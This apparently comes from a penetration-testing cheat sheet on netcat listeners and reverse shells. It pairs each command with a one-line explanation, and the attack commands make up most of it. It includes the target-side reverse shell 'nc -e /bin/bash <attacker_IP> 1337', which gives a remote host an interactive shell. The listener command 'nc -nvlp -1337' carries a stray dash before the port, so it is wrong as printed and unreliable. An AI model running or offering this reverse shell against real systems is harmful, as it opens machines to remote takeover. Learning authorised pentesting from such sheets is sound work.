Netcat - Listeners & Reverse Shells
Set up listeners and receive shells.
nc -nvlp -1337
Open a TCP listener on port 1337 (no DNS resolution).
ss -tlnp | grep 1337
Verifying if listeners are active and what process is bound to port 1337.
nc -e /bin/bash <attacker_IP> 1337
Simple reverse shell (target side). Only use on authorised systems.
-
You can change the port from 1337 to any port of your choice, if open.
-
You can also leverage Reverse Shell Generator to complete a successful reverse shell.